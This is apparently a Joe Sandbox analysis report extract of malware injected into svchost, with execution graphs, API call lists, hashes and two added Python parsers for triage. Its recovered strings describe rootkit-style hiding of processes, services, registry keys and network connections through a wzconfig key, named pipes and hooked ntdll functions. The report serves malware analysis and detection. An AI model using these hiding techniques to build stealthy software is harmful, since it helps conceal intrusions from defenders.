15736 216819b12bc 13 API calls
15737 216819b17f3 RegOpenKeyExW
15738 216819b17dc
15739 216819b1773 RegCloseKey
15740 216819b17ae RegCloseKey
15742 216819b182e RegOpenKeyExW
15743 216819b1817
15741 216819b12bc 13 API calls
15744 216819b17e9 RegCloseKey
15746 216819b1852
15747 216819b1869 RegOpenKeyExW
15745 216819b104c 5 API calls
15750 216819b1824 RegCloseKey
15751 216819b104c 5 API calls
15748 216819b18a4 RegCloseKey
15749 216819b188d
15752 216819b104c 5 API calls
15753 216819b185f RegCloseKey
15754 216819b189a RegCloseKey
15776 216819c6168
15757 216819b1283 GetProcessHeap
15758 216819b12ae __free_lconv_num
15760 216819b1327 GetProcessHeap
15761 216819b148a RegCloseKey
15767 216819b133e __free_lconv_num
15762 216819b1352 RegEnumValueW
15763 216819b1476 GetProcessHeap HeapFree
15765 216819b141e lstrlenW GetProcessHeap
15766 216819b13d3 GetProcessHeap
15768 216819b13f3 GetProcessHeap HeapFree
15769 216819b1443 StrCpyW
15778 216819b1534
15771 216819b11b5 RegCloseKey
15774 216819b10bf __free_lconv_num
15772 216819b10cf RegEnumValueW
15773 216819b114e GetProcessHeap
15775 216819b116e GetProcessHeap HeapFree
15777 216819c6177
15779 216819b154e
15782 216819b1584
15780 216819b1565 StrCmpIW
15781 216819b156d StrCmpW

Edges (from -> to):
15701 -> 15704
15702 -> 15704
15704 -> 15702, 15703
15705 -> 15710
15707 -> 15708, 15709
15708 -> 15707
15709 -> 15707
15710 -> 15711
15711 -> 15755
15713 -> 15714
15714 -> 15715
15715 -> 15716
15716 -> 15717
15717 -> 15718
15718 -> 15719
15719 -> 15720
15720 -> 15721, 15722
15721 -> 15707
15722 -> 15723, 15724
15723 -> 15759
15724 -> 15726, 15727
15726 -> 15730, 15731
15727 -> 15770
15730 -> 15735
15731 -> 15732, 15733
15732 -> 15736
15733 -> 15737, 15738
15735 -> 15739
15736 -> 15740
15737 -> 15742, 15743
15738 -> 15741
15739 -> 15731
15740 -> 15733
15741 -> 15744
15742 -> 15746, 15747
15743 -> 15745
15744 -> 15737
15745 -> 15750
15746 -> 15751
15747 -> 15748, 15749
15748 -> 15721
15749 -> 15752
15750 -> 15742
15751 -> 15753
15752 -> 15754
15753 -> 15747
15754 -> 15748
15755 -> 15776
15757 -> 15758
15758 -> 15713
15759 -> 15760, 15761
15760 -> 15767
15761 -> 15724
15762 -> 15767
15763 -> 15761
15765 -> 15767
15766 -> 15767
15767 -> 15762, 15763, 15765, 15766, 15768, 15769, 15778
15768 -> 15765
15769 -> 15767
15770 -> 15771, 15774
15771 -> 15726
15772 -> 15774
15773 -> 15774
15774 -> 15771, 15772, 15773, 15775
15775 -> 15774
15776 -> 15777
15778 -> 15779, 15782
15779 -> 15780, 15781, 15782
15780 -> 15779
15781 -> 15779
15782 -> 15767
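Joe Sandbox exports the execution graph above as a single run of tokens: a node is a five-digit block id followed by a hex address and optional labels (API names, or a collapsed subcall summarised as "N API calls"), and an edge is "src->dst". The parser below is an added example and is not part of this report or of Joe Sandbox's own tooling. It rebuilds the nodes and edges, finds the entry blocks, and answers the question a triager actually wants from this graph: which APIs are reachable from an entry, and along which block path. SAMPLE_GRAPH is a constructed subset of the tokens on this page (the RegQueryInfoKeyW / RegEnumValueW cluster plus one "13 API calls" node); the Node class and every helper name are the example's own.

```python
import re
from collections import deque
from dataclasses import dataclass

# Constructed sample: a subset of the flattened execution_graph tokens from the report excerpt
# above (the RegQueryInfoKeyW / RegEnumValueW cluster) plus one collapsed "N API calls" node.
SAMPLE_GRAPH = (
    "execution_graph 15759 216819b12bc RegQueryInfoKeyW 15760 216819b1327 GetProcessHeap 15759->15760 "
    "15761 216819b148a RegCloseKey 15759->15761 15767 216819b133e __free_lconv_num 15760->15767 "
    "15762 216819b1352 RegEnumValueW 15762->15767 15763 216819b1476 GetProcessHeap HeapFree 15763->15761 "
    "15765 216819b141e lstrlenW GetProcessHeap 15765->15767 15766 216819b13d3 GetProcessHeap 15766->15767 "
    "15767->15762 15767->15763 15767->15765 15767->15766 15768 216819b13f3 GetProcessHeap HeapFree "
    "15767->15768 15769 216819b1443 StrCpyW 15767->15769 15778 216819b1534 15767->15778 15768->15765 "
    "15769->15767 15779 216819b154e 15778->15779 15782 216819b1584 15778->15782 15780 216819b1565 StrCmpIW "
    "15779->15780 15781 216819b156d StrCmpW 15779->15781 15779->15782 15780->15779 15781->15779 "
    "15782->15767 15735 216819b12bc 13 API calls"
)

NODE_ID = re.compile(r"\d{5}")            # block ids in these dumps are five digits
ADDRESS = re.compile(r"[0-9a-f]{8,16}")   # lowercase hex virtual address
EDGE = re.compile(r"(\d+)->(\d+)")
SUMMARY = re.compile(r"(\d+) API calls")  # collapsed subcall label, e.g. "13 API calls"


@dataclass
class Node:  # the example's own helper type, not a Joe Sandbox structure
    addr: int      # virtual address of the block
    calls: list    # API names labelled on the block
    subcalls: int  # N from a collapsed "N API calls" label, else 0


def _is_node_start(toks, i):
    """A node begins where a five-digit id is immediately followed by a hex address."""
    return bool(NODE_ID.fullmatch(toks[i])) and i + 1 < len(toks) and bool(ADDRESS.fullmatch(toks[i + 1]))


def parse_execution_graph(text):
    """Rebuild (nodes, edges) from a flattened execution_graph token run."""
    toks = text.split()[1:]  # drop the leading "execution_graph" header token
    nodes, edges, i = {}, [], 0
    while i < len(toks):
        m = EDGE.fullmatch(toks[i])
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
        elif _is_node_start(toks, i):
            nid, addr, i = int(toks[i]), int(toks[i + 1], 16), i + 2
            labels = []  # everything up to the next edge or the next "id address" pair
            while i < len(toks) and not EDGE.fullmatch(toks[i]) and not _is_node_start(toks, i):
                labels.append(toks[i])
                i += 1
            s = SUMMARY.fullmatch(" ".join(labels))
            nodes[nid] = Node(addr, [] if s else labels, int(s.group(1)) if s else 0)
        else:
            raise ValueError(f"unexpected token {toks[i]!r} at position {i}")
    return nodes, edges


def _adjacency(edges):
    adj = {}
    for src, dst in edges:
        adj.setdefault(src, []).append(dst)
    return adj


def roots(nodes, edges):
    """Block ids with no incoming edge: the entry blocks of each traced function."""
    targets = {dst for _, dst in edges}
    return sorted(nid for nid in nodes if nid not in targets)


def reachable_calls(nodes, edges, start):
    """Sorted API names on every block reachable from `start` (inclusive)."""
    adj, seen, queue, names = _adjacency(edges), {start}, deque([start]), set()
    while queue:
        nid = queue.popleft()
        names.update(nodes[nid].calls if nid in nodes else [])
        for nxt in adj.get(nid, []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(nxt)
    return sorted(names)


def shortest_path_to_call(nodes, edges, start, api):
    """Shortest block path (BFS) from `start` to a block labelled `api`, or None."""
    adj, prev, queue = _adjacency(edges), {start: None}, deque([start])
    while queue:
        nid = queue.popleft()
        if nid in nodes and api in nodes[nid].calls:
            path = [nid]
            while prev[path[-1]] is not None:
                path.append(prev[path[-1]])
            return path[::-1]
        for nxt in adj.get(nid, []):
            if nxt not in prev:
                prev[nxt] = nid
                queue.append(nxt)
    return None


NODES, EDGES = parse_execution_graph(SAMPLE_GRAPH)

if __name__ == "__main__":
    for root in roots(NODES, EDGES):
        print(root, hex(NODES[root].addr), reachable_calls(NODES, EDGES, root))
```

Two caveats when running this over a full dump. Labels are taken verbatim, so CRT internals such as __free_lconv_num count as calls alongside Win32 imports; filter against the import set you care about. And the dump is split at subcall boundaries: a collapsed node such as 15735 ("13 API calls" at 216819b12bc) stands in for a call into the function whose own blocks start at 15759 (same address), so reachability across a collapsed subcall needs the callee's component joined in by address, which is why the parser keeps addr on every node.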

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
Similarity
• API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
• String ID:
• API String ID: 1683269324-0
• Opcode ID: fd13d599d4a1a9a129cf8228822ebf0962c6205abdf5c3edc3572841aa0737cc
• Instruction ID: 801c42961fe1b4382c844234cc78ac710e0d4036b76395ac5b92bddb1c98b79c
• Opcode Fuzzy Hash: fd13d599d4a1a9a129cf8228822ebf0962c6205abdf5c3edc3572841aa0737cc
• Instruction Fuzzy Hash: 391152707116668EFF60D721B94D7DE62A4BB74705F928029958E867D1EF3CC28C8700

Control-flow Graph

APIs
  • Part of subcall function 00000216819B1630: GetProcessHeap.KERNEL32 ref: 00000216819B163B
  • Part of subcall function 00000216819B1630: HeapAlloc.KERNEL32 ref: 00000216819B164A
  • Part of subcall function 00000216819B1630: RegOpenKeyExW.ADVAPI32 ref: 00000216819B16BA
  • Part of subcall function 00000216819B1630: RegOpenKeyExW.ADVAPI32 ref: 00000216819B16E7
  • Part of subcall function 00000216819B1630: RegCloseKey.ADVAPI32 ref: 00000216819B1701
  • Part of subcall function 00000216819B1630: RegOpenKeyExW.ADVAPI32 ref: 00000216819B1721
  • Part of subcall function 00000216819B1630: RegCloseKey.ADVAPI32 ref: 00000216819B173C
  • Part of subcall function 00000216819B1630: RegOpenKeyExW.ADVAPI32 ref: 00000216819B175C
  • Part of subcall function 00000216819B1630: RegCloseKey.ADVAPI32 ref: 00000216819B1777
  • Part of subcall function 00000216819B1630: RegOpenKeyExW.ADVAPI32 ref: 00000216819B1797
  • Part of subcall function 00000216819B1630: RegCloseKey.ADVAPI32 ref: 00000216819B17B2
  • Part of subcall function 00000216819B1630: RegOpenKeyExW.ADVAPI32 ref: 00000216819B17D2
• Sleep.KERNEL32 ref: 00000216819B1ADF
                                                                                                                                                                                                                                                • SleepEx.KERNELBASE ref: 00000216819B1AE5
                                                                                                                                                                                                                                                  • Part of subcall function 00000216819B1630: RegCloseKey.ADVAPI32 ref: 00000216819B17ED
                                                                                                                                                                                                                                                  • Part of subcall function 00000216819B1630: RegOpenKeyExW.ADVAPI32 ref: 00000216819B180D
                                                                                                                                                                                                                                                  • Part of subcall function 00000216819B1630: RegCloseKey.ADVAPI32 ref: 00000216819B1828
                                                                                                                                                                                                                                                  • Part of subcall function 00000216819B1630: RegOpenKeyExW.ADVAPI32 ref: 00000216819B1848
                                                                                                                                                                                                                                                  • Part of subcall function 00000216819B1630: RegCloseKey.ADVAPI32 ref: 00000216819B1863
                                                                                                                                                                                                                                                  • Part of subcall function 00000216819B1630: RegOpenKeyExW.ADVAPI32 ref: 00000216819B1883
                                                                                                                                                                                                                                                  • Part of subcall function 00000216819B1630: RegCloseKey.ADVAPI32 ref: 00000216819B189E
                                                                                                                                                                                                                                                  • Part of subcall function 00000216819B1630: RegCloseKey.ADVAPI32 ref: 00000216819B18A8
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1534210851-0

Control-flow Graph (graph image not included in this extract)

APIs
Memory Dump Source
• Source File: 00000005.00000002.2624132952.0000021681980000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021681980000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_21681980000_svchost.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0

Control-flow Graph (graph image not included; the rendered node data shows the function at 216819b3858 with a single StrCmpNIW call)

APIs
Memory Dump Source
• Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Control-flow Graph (graph image not included; the rendered node data shows the function at 216819b2b40 calling GetModuleHandleA, StrCmpNIW and lstrlenW)

APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
Similarity
• API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
• String ID: NtQueryObject$\Device\Nsi$ntdll.dll
• API String ID: 2119608203-3850299575
APIs
Memory Dump Source
• Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3140674995-0
APIs
Memory Dump Source
• Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
• String ID:
• API String ID: 1239891234-0
                                                                                                                                                                                                                                                • Opcode ID: 8ad7b10046b838cd94577b5e5c393489478853aa225d9b7cfe16be4989e4b7af
                                                                                                                                                                                                                                                • Instruction ID: e054e30c0b0b95726b8c33e037f8a02ccd43d39a05ed31de564de1db8a543090
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8ad7b10046b838cd94577b5e5c393489478853aa225d9b7cfe16be4989e4b7af
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F6318432214F808AEF64CF25E8483EE73A4F799758F510125EA9D43B99DF38C549CB00

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
Similarity
• API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
• String ID: SOFTWARE\wzconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
• API String ID: 106492572-440640706
• Opcode ID: 7c4a1d948d205c8ebe001ad381780c1a24ce9ec132a6c0bfe6eb7dfad1714e50
• Instruction ID: 8d20cfa4804ab780a92419fc37124bda36b7237033b19598f65d44058a0d936d
• Opcode Fuzzy Hash: 7c4a1d948d205c8ebe001ad381780c1a24ce9ec132a6c0bfe6eb7dfad1714e50
• Instruction Fuzzy Hash: 4971C976710A518AEF20DF66F89C6DD23B4FBA4B88F421125DA8E57B69EF34C448C740

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
Similarity
• API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
• String ID: d
• API String ID: 2005889112-2564639436
• Opcode ID: 8c63c14dadc595c9770824a5a8628493091718220e8d249dbd43905e110b320b
• Instruction ID: 19148b15e0785c90b7b5efe4d3b42acf1ede0d4496f1639d33d33aeac3e3b708
• Opcode Fuzzy Hash: 8c63c14dadc595c9770824a5a8628493091718220e8d249dbd43905e110b320b
• Instruction Fuzzy Hash: A3513A76604B848AEB54CF62F54C39EB7A2F799F99F454124DA8A07758EF3CC059C700

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
Similarity
• API ID: CurrentThread$AddressHandleModuleProc
• String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
• API String ID: 4175298099-1975688563
• Opcode ID: f9a2c3f0e0819997d594a213550735c5682f77fff7d415db42708e4ed7ca13a2
• Instruction ID: 8a70bb770da308128df2406dd91541ab9beca4aee603dab9a1a7320e1fae7a49
• Opcode Fuzzy Hash: f9a2c3f0e0819997d594a213550735c5682f77fff7d415db42708e4ed7ca13a2
• Instruction Fuzzy Hash: 1C3192B8200A6AACFE15EBA5F85D7EC6364EB74384FC24427944D16175AF78C24EC390

Control-flow Graph

APIs
• GetLastError.KERNEL32 ref: 00000216819BD3A7
• FlsGetValue.KERNEL32(?,?,?,00000216819C0FDB,?,?,?,00000216819C09CC,?,?,?,00000216819BCDBF), ref: 00000216819BD3BC
• FlsSetValue.KERNEL32(?,?,?,00000216819C0FDB,?,?,?,00000216819C09CC,?,?,?,00000216819BCDBF), ref: 00000216819BD3DD
• FlsSetValue.KERNEL32(?,?,?,00000216819C0FDB,?,?,?,00000216819C09CC,?,?,?,00000216819BCDBF), ref: 00000216819BD40A
• FlsSetValue.KERNEL32(?,?,?,00000216819C0FDB,?,?,?,00000216819C09CC,?,?,?,00000216819BCDBF), ref: 00000216819BD41B
• FlsSetValue.KERNEL32(?,?,?,00000216819C0FDB,?,?,?,00000216819C09CC,?,?,?,00000216819BCDBF), ref: 00000216819BD42C
• SetLastError.KERNEL32 ref: 00000216819BD447
• FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000216819C0FDB,?,?,?,00000216819C09CC,?,?,?,00000216819BCDBF), ref: 00000216819BD47D
• FlsSetValue.KERNEL32(?,?,00000001,00000216819BF23C,?,?,?,?,00000216819BC50F,?,?,?,?,?,00000216819B7AC0), ref: 00000216819BD49C
  • Part of subcall function 00000216819BDC3C: HeapAlloc.KERNEL32 ref: 00000216819BDC91
• FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000216819C0FDB,?,?,?,00000216819C09CC,?,?,?,00000216819BCDBF), ref: 00000216819BD4C4
  • Part of subcall function 00000216819BDCB4: HeapFree.KERNEL32 ref: 00000216819BDCCA
  • Part of subcall function 00000216819BDCB4: GetLastError.KERNEL32 ref: 00000216819BDCD4
• FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000216819C0FDB,?,?,?,00000216819C09CC,?,?,?,00000216819BCDBF), ref: 00000216819BD4D5
• FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000216819C0FDB,?,?,?,00000216819C09CC,?,?,?,00000216819BCDBF), ref: 00000216819BD4E6
Memory Dump Source
• Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
Similarity
• API ID: Value$ErrorLast$Heap$AllocFree
• String ID:
• API String ID: 570795689-0
• Opcode ID: 0311236df13cff9ddc5faef47bd35e239f24ae7eb6a96a8c603fa91771617960
• Instruction ID: e5a810ece8de63f246f6c79189baeaaf24dc1b76953f089aafb89c435761648f
• Opcode Fuzzy Hash: 0311236df13cff9ddc5faef47bd35e239f24ae7eb6a96a8c603fa91771617960
• Instruction Fuzzy Hash: 63416F303056748EFE5CB772955D3ED21C65B74BB8F164724A93A067D7EE28D8494300

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
Similarity
• API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
• String ID: \\.\pipe\wzchildproc32$\\.\pipe\wzchildproc64
• API String ID: 2171963597-1908187885
• Opcode ID: 61e9aad5965f0bf4cc9e1225d6c883f067986cfc1e7eceaf874e8f6c664e297a
• Instruction ID: 75ba977ad40e7920c3bef7c802ec8c1777a5adcc241fa8a0aef53cacd332f0b1
• Opcode Fuzzy Hash: 61e9aad5965f0bf4cc9e1225d6c883f067986cfc1e7eceaf874e8f6c664e297a
• Instruction Fuzzy Hash: A6212936614B508BFB10CB25F44C3AE67A1F799BA5F514215EA9902BA8DF7CC54DCB00

Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2624132952.0000021681980000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021681980000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_21681980000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                • String ID: csm$csm$csm
                                                                                                                                                                                                                                                • API String ID: 849930591-393685449
                                                                                                                                                                                                                                                • Opcode ID: 568c55b6c37a7b809f3d2baaff0a03158bf13451ebb28e48a05911c62cbff0d2
                                                                                                                                                                                                                                                • Instruction ID: 0442a4f2f429f8f48b690bb4eb5025a919f4eba2242cb7c6428bdf88597eaeb6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 568c55b6c37a7b809f3d2baaff0a03158bf13451ebb28e48a05911c62cbff0d2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DAD1AD72644B408FEF609F65D48C3DD77A0F7A6BA8F020216EE8957B96DB38D499C700

Control-flow Graph

Control-flow graph for the function at 216819baaf0 (rendered graph; edge list omitted). Same block structure as the function at 21681989ef0 above, calling only internal subroutines (216819bba08, 216819b8c04, 216819bccb8, 216819bafc0, 216819bbaa0, 216819bcc18 and others); no Windows API is invoked directly.
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                • String ID: csm$csm$csm
                                                                                                                                                                                                                                                • API String ID: 849930591-393685449
                                                                                                                                                                                                                                                • Opcode ID: 568c55b6c37a7b809f3d2baaff0a03158bf13451ebb28e48a05911c62cbff0d2
                                                                                                                                                                                                                                                • Instruction ID: 97df6bae4fd4c272dad566c70eca623a2d67dd5b8b7a4d677d9b7fd89218708b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 568c55b6c37a7b809f3d2baaff0a03158bf13451ebb28e48a05911c62cbff0d2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7CD1CF72A00BA08EEF60DF65D48C3DD77A0F7A9BA8F120115EE8957B96DB34D489C700

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                                • Opcode ID: 78242e2ad1e66ce797da3b321992a6ad1daff7ac6a80aafc19c0109c88dcfca8
                                                                                                                                                                                                                                                • Instruction ID: c92aa99dd7ccd533ff694c828cd583452ffd66c277c2e8ad28bd1c6b2b834d25
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 78242e2ad1e66ce797da3b321992a6ad1daff7ac6a80aafc19c0109c88dcfca8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 95419032311A2099FE19DB66A94C7DD22A5BB69BE0F4B41299D8D97794EB38C44DC300

Control-flow Graph

Control-flow graph for the function at 216819b104c (rendered graph; edge list omitted). The entry block calls RegQueryInfoKeyW; the block at 216819b10cf calls RegEnumValueW and is re-entered in a loop; one path (216819b114e) calls GetProcessHeap, an internal subroutine at 216819c6168, GetProcessHeap again and HeapFree before rejoining the loop.
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                                                                                                                                                                • String ID: d
                                                                                                                                                                                                                                                • API String ID: 3743429067-2564639436
                                                                                                                                                                                                                                                • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                                                                                                                                                                                • Instruction ID: c23a57b3d10ce56a0b0d8c8c28d6846a727f3081025e08c0ecdbdda6a56f4326
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AA415C73214B84CAEB60CF21F44879E77A1F399B99F458129DB8907B58EF38C589CB40
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FlsGetValue.KERNEL32(?,?,?,00000216819BCD4E,?,?,?,?,?,?,?,?,00000216819BD50D,?,?,00000001), ref: 00000216819BD5F7
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00000216819BCD4E,?,?,?,?,?,?,?,?,00000216819BD50D,?,?,00000001), ref: 00000216819BD616
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00000216819BCD4E,?,?,?,?,?,?,?,?,00000216819BD50D,?,?,00000001), ref: 00000216819BD63E
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00000216819BCD4E,?,?,?,?,?,?,?,?,00000216819BD50D,?,?,00000001), ref: 00000216819BD64F
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00000216819BCD4E,?,?,?,?,?,?,?,?,00000216819BD50D,?,?,00000001), ref: 00000216819BD660
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Value
                                                                                                                                                                                                                                                • String ID: 1%$Y%
                                                                                                                                                                                                                                                • API String ID: 3702945584-1395475152
                                                                                                                                                                                                                                                • Opcode ID: c43ba9056afb091907f0ee91a963f4e74318913cfa62c74dbd7af27afc39a0a2
                                                                                                                                                                                                                                                • Instruction ID: 023bd0c4fd2a4507a0837e78a07aff7af5b620e54b3f1399547a36c97c6cd93f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c43ba9056afb091907f0ee91a963f4e74318913cfa62c74dbd7af27afc39a0a2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BD119430704670C9FE58A722A55D3ED61CA6F647F8F178335A87D477DAEE28C8094700
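The function blocks above repeat the same layout for every recovered function: an optional list of resolved API calls, the memory dump the code was lifted from, and a Similarity block with API ID, String ID, Opcode ID and fuzzy hashes. When triaging a report like this one, it is useful to pull those fields out of the text so the same Opcode ID can be correlated across memory regions (the exception-handling routine with Opcode ID 568c55b6… appears in both the 0x21681980000 and 0x216819B0000 dumps of svchost) and the resolved imports can be listed per module. The parser below is an added example, not Joe Sandbox code; it assumes the field layout shown on this page, and its input is an excerpt assembled from values that appear in the blocks above.

```python
import re
from collections import defaultdict

# Excerpt assembled from the function blocks on this page (three functions,
# two memory dumps). Only the fields the parser needs are included.
REPORT_EXCERPT = """\
Memory Dump Source
• Source File: 00000005.00000002.2624132952.0000021681980000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021681980000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_21681980000_svchost.jbxd
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
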